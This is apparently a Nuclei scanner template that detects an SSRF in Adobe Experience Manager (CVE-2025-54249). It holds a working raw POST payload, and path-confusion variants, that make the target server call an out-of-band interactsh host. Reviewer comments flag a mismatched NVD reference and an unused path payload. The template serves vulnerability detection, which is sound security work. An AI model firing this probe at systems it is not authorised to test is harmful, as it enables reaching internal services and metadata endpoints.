# Nuclei HTTP template for CVE-2025-54249 (AEM SSRF). Reformatted into block
# style; values are unchanged. Detection hint for defenders: the probe is
# recognisable in access logs by the `User-Agent: hopgoblin/1.0` header and by
# `;x='...'` path-suffix variants of /services/accesstoken/verify.
id: CVE-2025-54249

info:
  name: Adobe Experience Manager ≤ 6.5.23.0 – SSRF
  author: DhiyaneshDk,assetnote
  severity: medium
  description: |
    Adobe Experience Manager versions 6.5.23.0 and earlier are affected by a Server-Side Request Forgery (SSRF) vulnerability that could result in a Security feature bypass
  impact: |
    Unauthenticated attackers can bypass security feature restrictions and force the server to make requests to arbitrary URLs, potentially enabling access to internal services and metadata endpoints.
  remediation: |
    Upgrade Adobe Experience Manager to a version later than 6.5.23.0 that properly validates redirect URLs and implements SSRF protections.
  reference:
    - https://github.com/assetnote/hopgoblin/blob/main/hopgoblin.py
    # NOTE(review): this NVD entry is for CVE-2025-54251, while the template id
    # is CVE-2025-54249 (both sit under the same Adobe bulletin) — confirm which
    # advisory is intended.
    - https://nvd.nist.gov/vuln/detail/CVE-2025-54251
    - https://helpx.adobe.com/security/products/experience-manager/apsb25-90.html
  metadata:
    verified: true
    # One request per entry in payloads.path below.
    max-request: 6
    vendor: adobe
    product: experience_manager
    fofa-query: body="/libs/granite/core/content/login.html"
  tags: cve,cve2025,adobe,aem,ssrf,oast,oob,vkev,vuln

http:
  - raw:
      - |
        POST /services/accesstoken/verify;x='.pdf/x' HTTP/1.1
        Host: {{Hostname}}
        User-Agent: hopgoblin/1.0
        Accept-Encoding: gzip, deflate, br
        Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
        Connection: keep-alive
        Cache-Control: max-age=0
        Sec-Ch-Ua: "Google Chrome";v="139", "Not=A?Brand";v="8", "Chromium";v="139"
        Sec-Ch-Ua-Mobile: ?0
        Sec-Ch-Ua-Platform: "macOS"
        Accept-Language: en-US;q=0.9,en;q=0.8
        Sec-Fetch-Site: none
        Sec-Fetch-Mode: navigate
        Sec-Fetch-User: ?1
        Sec-Fetch-Dest: document
        Content-Type: application/x-www-form-urlencoded

        auth_url=https%3A%2F%2F{{interactsh-url}}

    # NOTE(review): payloads.path is declared, but the request line above does
    # not reference {{path}}; as written every iteration sends the same request
    # line — confirm this is intended.
    payloads:
      path:
        - "/services/accesstoken/verify;x='.pdf/x'"
        - "/services/accesstoken/verify;x='.ico/x'"
        - "/services/accesstoken/verify;x='.html/x'"
        - "/services/accesstoken/verify;x='.css/x'"
        - "/services/accesstoken/verify;x='x/graphql/execute/json/x'"
        - "/graphql/execute.json/..%2F../services/accesstoken/verify"

    stop-at-first-match: true
    matchers-condition: and
    matchers:
      # Both conditions must hold: an HTML 200 response AND an out-of-band HTTP
      # callback to the interactsh host, so a 200 alone is not a finding.
      - type: dsl
        dsl:
          - "status_code == 200"
          - "contains_any(body,'<html')"
        condition: and

      - type: word
        part: interactsh_protocol
        words:
          - "http"

    extractors:
      - type: dsl
        dsl:
          - 'interactsh_protocol'
          - 'interactsh_request'
# Template signature from the upstream registry; any edit to this file
# (including the comments above) invalidates it until re-signed.
# digest: 4b0a00483046022100f75646a98daab993617823879973039b68b1423affcc2b5c216ba487ee933bd30221008777ac00011c7b08e69648b41990221d1195771e54f979ba3654ccd53f078be0:922c64590222798bb761d5b6d8e72950